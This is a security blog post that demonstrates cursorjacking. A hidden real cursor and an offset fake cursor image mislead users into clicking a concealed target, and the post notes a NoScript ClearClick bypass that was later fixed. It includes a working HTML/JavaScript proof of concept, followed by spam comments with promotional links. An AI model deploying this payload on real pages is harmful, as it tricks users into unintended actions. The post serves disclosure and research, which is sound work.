About a year ago, Marcus Niemietz demonstrated UI redressing technique called cursorjacking. It deceived users by using a custom cursor image, where the pointer was displayed with an offset. So the displayed cursor was shifted to the right from the actual mouse position. With clever positioning of page elements attacker could direct user clicks to desired elements.
Cursor fun
Yesterday Mario Heiderich noticed that<body style="cursor:none">works across User-Agents, so one could easily totally hide the original mouse cursor. Combine that with mousemove listener, mouse cursor image and a little distraction and we have another UI redressing vector. The idea is very simple:
<body style="cursor:none;height: 1000px;"> <img style="position: absolute;z-index:1000;" id=cursor src="cursor.png" /> <button id=fake style="font-size: 150%;position:absolute;top:100px;left:630px;">click me click me</button> <div style="position:absolute;top:100px;left:30px;"> <a href="#" onclick="alert(/you clicked-me-instead/)">i'm not important</a> </div> <script> var oNode = document.getElementById('cursor'); var onmove = function (e) { var nMoveX = e.clientX, nMoveY = e.clientY; oNode.style.left = (nMoveX + 600)+"px"; oNode.style.top = nMoveY + "px"; }; document.body.addEventListener('mousemove', onmove, true); </script> </body>
The one on the left is real, right is fake. The idea is to distract you from noticing the left one. |
Demo
It's just a sketch (e.g. in real life one would have to handle skipping mouse cursor when it's over a frame), but it works nonetheless. Try this good cursorjacking example ;) Here's sources for anyone interested.Bonus
NoScript ClearClick (a clickjacking protection) works, because it detects clicks on areas that are hidden from the user (e.g. with opacity:0). With cursorjacking the protection won't get triggered as attacker is not hiding the original element to click on (Twitter button in the PoC). The only deception is distraction. So, currently, this technique is a NoScript ClearClick protection bypass.Update: Fixed in NoScript 2.2.8 RC1
We at Jexaa specialise in providing quality modern technology to consumers at unbelievable
ReplyDeleteprices.If you're looking for a versatile and multifunctional android tablet PC, you will be
overwhelmed by the choice on offer from our online shop.
Thanks!
Android Tablet
Hi dear! Wish you are doing
ReplyDeleteamazing, well awesome essential information. I must say...really verified &
appropriate to analysis.
http://www.gardendecors.net
Hahaha, I love that script :)
ReplyDeletehttp://www.fbpiraterfr.com/
http://gadgetspeaks.com/
http://aadhaarcarduid.org/
http://cheatjunction.com/hay-day-diamond-hack-cheats/
Greatt blog
ReplyDelete